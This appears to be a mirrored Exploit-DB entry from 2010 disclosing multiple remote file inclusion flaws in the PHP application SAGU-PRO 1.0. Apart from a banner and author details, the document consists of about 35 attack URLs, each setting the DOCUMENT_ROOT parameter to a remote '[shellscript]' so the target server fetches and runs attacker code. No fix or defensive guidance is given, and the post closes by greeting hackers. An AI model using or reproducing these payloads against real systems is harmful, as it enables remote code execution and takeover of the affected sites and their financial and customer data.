SAGU-PRO 1.0 – Multiple Remote File Inclusions - 体验盒子

作者： mat
日期： 2010-04-04
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/12052/
\\\|///
\\- -//
 (@ @ )
----oOOo--(_)-oOOo--------------------------------------------------
SAGU-PRO v1.0 Multiple Remote File Include Vulnerability
Script: http://gulbf.com.br/?q=node/145
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
 ( )
ooooO ) /
( )(_/
 \ (
\_)

//-----------------------------------------------------------------------------------------------------------+
http://[target]/[path]/cliente/ver_imagem.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/importar_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/up_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/ver_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/boletounibanco.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/bb/boleto_bb.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/bradesco06/boleto_bradesco.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/cef/boleto_cef.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/hsbc/boleto_hsbc.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/itau/boleto_itau.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/real57/boleto_real.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/recibo/recibo.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/santader_banespa_102/boleto_santander_banespa.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/up_fluxo.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/importar_fluxos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/ver_fluxos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/post/altera_contacorrente.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_ativos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_data_ativacao.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_geral.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_suspensos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_valores_cobranca.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_vencto.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/prev_outros_servicos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/prev_pacte_naveg.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/resumo_log_pacote_conexao.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_evolucao_instalacoes_anual.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]
//-----------------------------------------------------------------------------------------------------------+

Greetings: All Hackerz